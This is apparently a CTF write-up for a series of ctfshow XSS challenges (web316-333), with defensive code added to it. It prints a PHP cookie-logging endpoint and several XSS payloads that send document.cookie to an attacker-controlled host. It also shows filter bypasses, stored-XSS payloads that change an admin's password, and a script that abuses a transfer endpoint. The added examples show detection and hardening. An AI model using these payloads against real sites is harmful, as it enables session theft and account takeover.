This may be a bit long-winded; it records my own process of working through the questions.
web316
A bot in the background visits our link every so often (usually every 15 seconds) (after all, you need 10 egg bots to keep your sharing status). When the bot accesses our XSS, we can get the admin's cookie.
There are two ways to get it. One is an online XSS platform, such as https://xsshs.cn/ , https://xss.pt/ or http://xsscom.com , to generate XSS links.
The other is to build it on your own website and write a piece of PHP code, such as
# xss.php
<?php
$cookie = $_GET['cookie'];
$log = fopen("cookie.txt", "a");
fwrite($log, $cookie . "\n");
fclose($log);
?>
Generally speaking, the first method is enough for us, but sometimes only the second method works. For example, in the final assessment question of ctfshow, the second machine cannot reach the internet and cannot be proxied, and that second machine has XSS; in that case only the second method can obtain the cookie.
Here https://xss.pt/xss.php is used. First register and log in to the home page, then click Create
select the default module
You get many kinds of links. Use any one to generate a "Blessing", refresh the title after it is generated, and then return to the project interface
Of course, a very common situation is: you are not admin no flag
Don't panic, this situation is normal (that is, the XSS hit yourself); just do it a few more times
It's so sad, I've been hitting myself more than a dozen times
Mad, I'm speechless. I put my own server on it: I deployed the PHP code above on my server and wrote this statement
<script>document.location.href="http://ip/xss.php?cookie="+document.cookie</script>
Why it succeeded just once, I don't understand.
web317
The payload of the previous question doesn't get through because something is filtered, but I don't know what. Replacing script with body succeeds, which means script is filtered.
<body onload="window.location.href='http://ip/xss.php?cookie='+document.cookie"></body>
web318
The payload of the previous question was successful
web319
The payload of the previous question was successful
web320
The payload of the previous question failed, and I don't know what was filtered, so test it here.
The first test deletes everything in front of href
This echoes, which means the filtered point is further in front, and body is no problem
The second time I delete everything in front of window; there is also an echo, indicating that the filter point is in front of that
onload is no problem, body is no problem, so the problem lies in the space between them
Bypass method:
TAB
/
/**/
<body/**/onload="window.location.href='http://ip/xss.php?cookie='+document.cookie"></body>
web321
The payload of the previous question was successful
web322
Ugh, this one is so disgusting: here you need to rename xss.php on the server to something else; in short, the three characters xss must not appear
<body/**/onload="window.location.href='http://ip/a.php?cookie='+document.cookie"></body>
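The lesson of web322 from the defender's side is that matching on the collector's file name ("xss" in the URL) is a blacklist that costs the attacker one rename. What does not change between xss.php and a.php is the value being carried: a session cookie name or a flag-format string inside a query parameter sent to an external host. The detector below, an added example that is not part of the original writeup, scans constructed egress-proxy log lines for the host that runs the admin bot (the log format, the 203.0.113.5 collector address, the ".internal" allow-list suffix and the flag value are all assumptions) and alerts on the parameter value rather than the path:

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed egress-proxy log lines for the host that runs the admin bot.
# Format assumed for this example: client, timestamp, method, full URL, status.
SAMPLE_LOG = """\
10.0.0.8 [01/Jan/2024:10:00:01 +0000] GET http://203.0.113.5/xss.php?cookie=PHPSESSID=abc123def456 200
10.0.0.8 [01/Jan/2024:10:00:16 +0000] GET http://203.0.113.5/a.php?cookie=PHPSESSID=abc123def456 200
10.0.0.8 [01/Jan/2024:10:00:20 +0000] GET http://cdn.example.net/jquery.min.js 200
10.0.0.8 [01/Jan/2024:10:00:31 +0000] GET http://203.0.113.5/a.php?cookie=ctfshow%7Bexample-flag%7D 200
10.0.0.8 [01/Jan/2024:10:00:45 +0000] GET http://intranet.example.internal/index.php?user=admin 200
"""

LINE_RE = re.compile(
    r'^(?P<client>\S+) \[(?P<ts>[^\]]+)\] (?P<method>\S+) (?P<url>\S+) (?P<status>\d+)$'
)

# What a leak looks like: a query parameter VALUE (the file name is irrelevant)
# that carries a session cookie name or a secret in the challenge's flag format.
SESSION_COOKIE_NAMES = ("PHPSESSID",)
FLAG_RE = re.compile(r'ctfshow\{[^}]*\}')
INTERNAL_SUFFIXES = (".internal",)  # assumed: hosts the bot is allowed to talk to


def leaked_values(url):
    """Return (param, value) pairs in url's query string that carry a secret."""
    query = urlsplit(url).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl splits on the first '=' only, so 'cookie=PHPSESSID=abc' keeps
        # the whole 'PHPSESSID=abc' as the value; it also decodes %7B / %7D.
        if any(c + "=" in value for c in SESSION_COOKIE_NAMES) or FLAG_RE.search(value):
            hits.append((name, value))
    return hits


def is_external(url):
    """True when the destination host is outside the assumed internal suffix list."""
    host = urlsplit(url).hostname or ""
    return not host.endswith(INTERNAL_SUFFIXES)


def scan_log(text):
    """Return one alert dict per line where a secret leaves for an external host."""
    alerts = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # malformed line: skip rather than crash the scan
        url = m.group("url")
        if not is_external(url):
            continue
        hits = leaked_values(url)
        if hits:
            parts = urlsplit(url)
            alerts.append({
                "ts": m.group("ts"),
                "host": parts.hostname,
                "path": parts.path,
                "leaks": hits,
            })
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

Three of the five constructed lines alert (the xss.php hit, the renamed a.php hit, and the flag value), while the CDN fetch and the intranet request do not; the rename in web322 buys the attacker nothing against this rule.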
web323
The payload of the previous question was successful
web324
The payload of the previous question was successful
web325
The payload of the previous question was successful
web326
The payload of the previous question was successful
web327
The topic changes: stored XSS
The recipient must be admin
Then try the web322 payload as the content of the letter
Success
web328
A login page, account admin; try the payload above as the password
Failed; try the payload in both account and password
Still failed
Hey, there is a registration button; try it.
Unable to register as admin, so just use another name. After logging in there is a user management page, which only admin can see
Because only the administrator can see the user management page, the idea is to inject the payload into the user management page, which the administrator will access.
Register an account with the above payload as the password and try
In practice, the result is no
Try it with <script> here; note that a semicolon should be added at the end
<script>window.location.href='http://ip/a.php?cookie='+document.cookie;</script>
I got the administrator's cookie here, then logged in directly with the cookie and tried it
However, the management interface still can't be seen; the cookie is temporary, so edit it directly in the browser's storage
Then refresh the interface and see the flag, but the flag only flashes by, so capture the packet to read it
web329
The method is the same as above; the cookie can be obtained but the page still can't be accessed
The reason is that the administrator logs out after visiting the page, so the cookie we get is the one from the administrator's previous visit, which has already been logged out.
No way here. I saw that the writeup (wp) uses JS
Along these lines, watch the video https://www.bilibili.com/video/BV1gi4y1A76p
<script>$('.laytable-cell-1-0-1').each(function(index,value){
    if(value.innerHTML.indexOf('ctf'+'show')>-1){
        window.location.href='http://ip/a.php?cookie='+value.innerHTML;
    }
});</script>
The reason for writing 'ctf'+'show' is that if you write ctfshow directly, the first item containing ctfshow will be our own (the payload itself).
…
Add a {: 'ctf'+'show{'
Remember to open a new instance every time the data gets polluted
web330
There is an option to change the password, so just make the admin change his own password directly
<script>window.location.href='http://127.0.0.1/api/change.php?p=admin';</script>
Just register an account with the payload as its name
web331
The idea is the same as the previous one, but the method changes from GET to POST
<script>$.ajax({url:'api/change.php',type:'post',data:{p:'2333'}});</script>
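Both web330 and web331 work because api/change.php trusts any request the admin's browser happens to send: a plain GET with the new password in the query string, or a POST fired by jQuery from the stored payload. The handler below is an added example, not the challenge's api/change.php, and the Request class, user store and hashing are assumptions made for the example. It shows the checks that stop each of the two payloads: GET is refused outright (web330), a POST without the per-session anti-CSRF token is refused (web331), the acting account comes from the session rather than a parameter, and a sensitive change demands the current password so a stolen session alone is not enough.

```python
import hashlib
import hmac
import secrets


class Request:
    """Minimal request model assumed for this example (not a real framework)."""

    def __init__(self, method, session, form):
        self.method = method    # "GET" / "POST"
        self.session = session  # server-side session dict for this browser
        self.form = form        # submitted parameters


def hash_password(password, salt=None):
    """Salted PBKDF2-SHA256; returns salt || digest as bytes."""
    salt = salt if salt is not None else secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return salt + digest


def verify_password(users, user, password):
    """Constant-time comparison against the stored salt || digest."""
    stored = users.get(user)
    if stored is None:
        return False
    return hmac.compare_digest(stored, hash_password(password, stored[:16]))


def issue_csrf_token(session):
    """Per-session token: stored server-side and embedded in the real change form."""
    token = secrets.token_hex(16)
    session["csrf"] = token
    return token


def change_password(request, users):
    """Hardened password-change handler. Returns (status, message)."""
    # 1. A state change must not be reachable with GET: a GET is exactly what a
    #    stored <script>window.location.href=...</script> makes the victim send.
    if request.method != "POST":
        return 405, "method not allowed"
    # 2. The account being changed is the session's, never a request parameter.
    user = request.session.get("user")
    if not user:
        return 401, "login required"
    # 3. The request must carry the anti-CSRF token that only a page we served knows;
    #    a $.ajax POST injected from another user's stored field cannot supply it.
    sent = request.form.get("csrf", "")
    expected = request.session.get("csrf", "")
    if not expected or not hmac.compare_digest(sent.encode(), expected.encode()):
        return 403, "bad csrf token"
    # 4. Re-authenticate for a sensitive change, so a hijacked session is not enough.
    if not verify_password(users, user, request.form.get("current", "")):
        return 403, "current password wrong"
    new = request.form.get("p", "")
    if len(new) < 8:
        return 400, "new password too short"
    users[user] = hash_password(new)
    return 200, "password changed"


if __name__ == "__main__":
    users = {"admin": hash_password("oldpassword1")}   # constructed account
    session = {"user": "admin"}
    token = issue_csrf_token(session)
    # web330-style GET and web331-style token-less POST are both refused
    print(change_password(Request("GET", session, {"p": "admin"}), users))
    print(change_password(Request("POST", session, {"p": "2333"}), users))
    ok = Request("POST", session, {"p": "newpassword9", "csrf": token, "current": "oldpassword1"})
    print(change_password(ok, users))
```

The order of the checks matters: method and login are cheap and rejected first, the token check runs before anything touches the password store, and the current-password check is the last gate because it is the only one that costs a hash computation.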
web332
The flag costs 9999 yuan to buy, and a newly registered account has 5 yuan.
Then I found that transferring a negative amount adds money to yourself; otherwise it is deducted, hahahaha
Just transfer -9999 to admin
web333
I wanted to write a script for the last question, but I found a simple method, so I didn't write it
Here I wrote a script to register accounts and give myself money like crazy
After writing for more than 20 minutes and debugging, I found that I couldn't log in... I don't know why, boo hoo
After reading Master Yu's script: money can be added by transferring it to yourself. I'm too stupid.
import requests

x = 5  # starting balance of a new account; doubles roughly every round
url = "http://e8e0aa13-bff2-4b78-a8cb-f7c0f0e73ae2.challenge.ctf.show/api/amount.php"
url2 = "http://e8e0aa13-bff2-4b78-a8cb-f7c0f0e73ae2.challenge.ctf.show/api/getFlag.php"
headers = {
    'Cookie': 'PHPSESSID=jkvcavn3fpfel2opl4afqdcepp'}  # your own session id after logging in
while True:
    print(x)
    t = x - 1  # transfer one less than the balance to yourself
    data = {
        'u': 'mumuzi',  # the registered username
        'a': str(t)
    }
    r = requests.post(url, headers=headers, data=data)
    print(r.text)
    if (x > 10000):
        r2 = requests.get(url2, headers=headers)
        print(r2.text)
        break
    x += t  # self-transfer adds the amount instead of moving it
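web332 and web333 are the same bug seen twice: amount.php never validates the amount's sign, never refuses a transfer to yourself, and apparently writes the recipient's balance from a value read before the sender was debited. The toy ledger below is an added example, not the challenge's api/amount.php (its real source is not on the page, so the stale-read naive version is an assumption of how such a bug arises). transfer_naive reproduces both behaviours from the writeup, -9999 crediting the sender and a self-transfer of 4 turning 5 into 9, and Wallet.transfer shows the checks that close them:

```python
from decimal import Decimal, InvalidOperation


def transfer_naive(balances, sender, recipient, amount):
    """Unchecked, stale-read transfer: the bug pattern assumed behind web332/web333."""
    amt = Decimal(str(amount))
    s = balances[sender]          # both balances read before either is written...
    r = balances[recipient]
    balances[sender] = s - amt    # ...so a self-transfer is overwritten by the credit
    balances[recipient] = r + amt


class Wallet:
    """Constructed account ledger with the validation amount.php lacks."""

    FLAG_PRICE = Decimal("9999")

    def __init__(self, balances):
        self.balances = {user: Decimal(str(v)) for user, v in balances.items()}

    def transfer(self, sender, recipient, amount):
        """Move amount from sender to recipient. Returns (ok, message); never partial."""
        try:
            amt = Decimal(str(amount))
        except (InvalidOperation, ValueError, TypeError):
            return False, "amount is not a number"
        if amt <= 0:                              # web332: -9999 would credit the sender
            return False, "amount must be positive"
        if sender == recipient:                   # web333: self-transfer must not mint money
            return False, "cannot transfer to yourself"
        if sender not in self.balances or recipient not in self.balances:
            return False, "unknown account"
        if self.balances[sender] < amt:           # check funds before debiting
            return False, "insufficient funds"
        # Debit first, then credit, each against the live balance (no stale copies).
        self.balances[sender] -= amt
        self.balances[recipient] += amt
        return True, "ok"

    def can_buy_flag(self, user):
        return self.balances.get(user, Decimal(0)) >= self.FLAG_PRICE


if __name__ == "__main__":
    # Constructed accounts mirroring the challenge: admin and a fresh user with 5 yuan.
    naive = {"admin": Decimal(0), "mumuzi": Decimal(5)}
    transfer_naive(naive, "mumuzi", "admin", -9999)
    print("naive after -9999 to admin:", naive)        # sender now has 10004
    naive = {"mumuzi": Decimal(5)}
    transfer_naive(naive, "mumuzi", "mumuzi", 4)
    print("naive after 4 to self:", naive)              # 5 became 9, as in the script

    w = Wallet({"admin": 0, "mumuzi": 5})
    print(w.transfer("mumuzi", "admin", -9999))
    print(w.transfer("mumuzi", "mumuzi", 4))
    print(w.transfer("mumuzi", "admin", 5), w.balances)
```

Using Decimal rather than float keeps the comparisons exact, and returning a (ok, message) pair instead of raising keeps the "no partial write" guarantee obvious: every rejection returns before the first assignment to a balance.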
At this point, the XSS part is over